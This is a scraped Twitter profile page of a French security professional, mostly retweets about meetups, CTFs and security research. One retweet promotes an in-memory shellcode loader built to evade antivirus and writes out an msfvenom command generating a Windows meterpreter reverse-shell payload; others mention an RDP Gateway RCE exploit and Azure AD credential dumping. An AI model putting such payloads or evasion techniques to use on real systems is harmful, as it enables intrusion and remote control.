Jérémy MIRRE

@ifollownogod

Proud Staff \ OSCP \ DevSecOps \ Surf sur la BlockChain \ Codeur d'Intelligence Artificielle \ 0day maker \ Bug Bounty Hunter @100k/year

Vrijeme pridruživanja: prosinac 2014.

Tweetovi

Blokirali ste korisnika/cu @ifollownogod

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @ifollownogod

  1. proslijedio/la je Tweet
    29. sij

    Bien joué à notre team ! 4ème au challenge CDAISI du FIC 😁 On enchaîne avec le gg

    Poništi
  2. proslijedio/la je Tweet

    I personally like to get all my epidemiology related news from people who can spell neither corona nor virus

    Poništi
  3. proslijedio/la je Tweet
    27. sij

    Merci pour la soirée ! Des conférences très intéressantes !!

    Poništi
  4. proslijedio/la je Tweet
    27. sij

    Merci à tous et notamment à nos speakers pour cette édition de la ! On se retrouve le lundi 24 du mois prochain ! Bonne soirée à tous et bon / 😎

    Poništi
  5. proslijedio/la je Tweet
    27. sij

    An extra lecture is planned for tonight! Thus, will talk about internal CTF organization (more information on ) As we now have three talks, we've made a planning 😉

    Poništi
  6. proslijedio/la je Tweet
    26. sij

    Ladies and gentlemen, I present you a working Remote Code Execution (RCE) exploit for the Remote Desktop Gateway (CVE-2020-0609 & CVE-2020-0610). Accidentally followed a few rabbit holes but got it to work! Time to write a blog post ;) Don't forget to patch!

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    22. sij

    Lundi soir prochain nous parlerons de la protection des réseaux automobiles avec , puis présentera un talk sur l’utilisation du cloud comme infrastructure d’hébergement de malwares ! Pour plus d’infos :

    Poništi
  8. proslijedio/la je Tweet
    5. sij

    从内存中加载 SHELLCODE bypass AV查杀 This is a program to run shellcode as its own process, all from memory. This was written to defeat anti-virus detection. msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444

    Poništi
  9. proslijedio/la je Tweet
    17. sij

    Nous sommes toujours à la recherche d’un second talk pour la du 27 ! Si vous souhaitez présenter un sujet qui vous intéresse, envoyez nous une brève description par DM ! 😎 cc

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    15. sij

    Regarding the bug we recently turned in to Microsoft: If you think that one is a doozie, just imagine what we're sitting on that we HAVEN'T turned in.

    Poništi
  11. proslijedio/la je Tweet
    6. sij

    Tout d'abord, nous vous souhaitons une bonne année 2020 ! 🎆 Un deuxième créneau de conférence est encore disponible pour la du 27/01 ! N'hésitez pas à nous envoyer vos propositions de sujet par DM ou mail

    Poništi
  12. 31. pro 2019.
    Poništi
  13. proslijedio/la je Tweet
    23. pro 2019.

    Encore une bonne soirée avec la , de belles rencontres et une très bonne convivialité !

    Poništi
  14. proslijedio/la je Tweet
    23. pro 2019.

    Nous sommes au 1er étage du ! Rejoignez-nous si vous êtes dans le coin 😉

    Poništi
  15. proslijedio/la je Tweet
    23. pro 2019.

    Rendez-vous ce soir au dernier bar pour l'apéro de noël ! À propos de la rump session, une présentation peut durer entre 5 et 10 minutes, n'hésitez pas à présenter un sujet qui vous passionne 🎩🎅

    Poništi
  16. proslijedio/la je Tweet
    19. pro 2019.

    Rendez-vous lundi soir dès 19h au pour le verre de noël ! Une petite rump session sera organisée, n'hésitez pas à préparer des petits sujets 🎅

    Poništi
  17. proslijedio/la je Tweet
    14. pro 2019.

    Thanks you for this amazing CTF ! See you next year !

    Poništi
  18. proslijedio/la je Tweet
    11. pro 2019.

    MobSF v3 is here! We have a brand new UI, supports OWASP Mobile Top 10 and few other goodies. See what's new:

    Poništi
  19. proslijedio/la je Tweet
    11. pro 2019.

    [New blog] Updating adconnectdump - a journey into DPAPI; In which I describe the process of understanding and decrypting the DPAPI encrypted credentials of Azure AD connect. This again enables dumping these credentials via only network calls (as admin).

    Prikaži ovu nit
    Poništi
  20. proslijedio/la je Tweet

    New reversing & exploitation challenge is online ICYMI. More challenges and free livestreams coming soon!

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·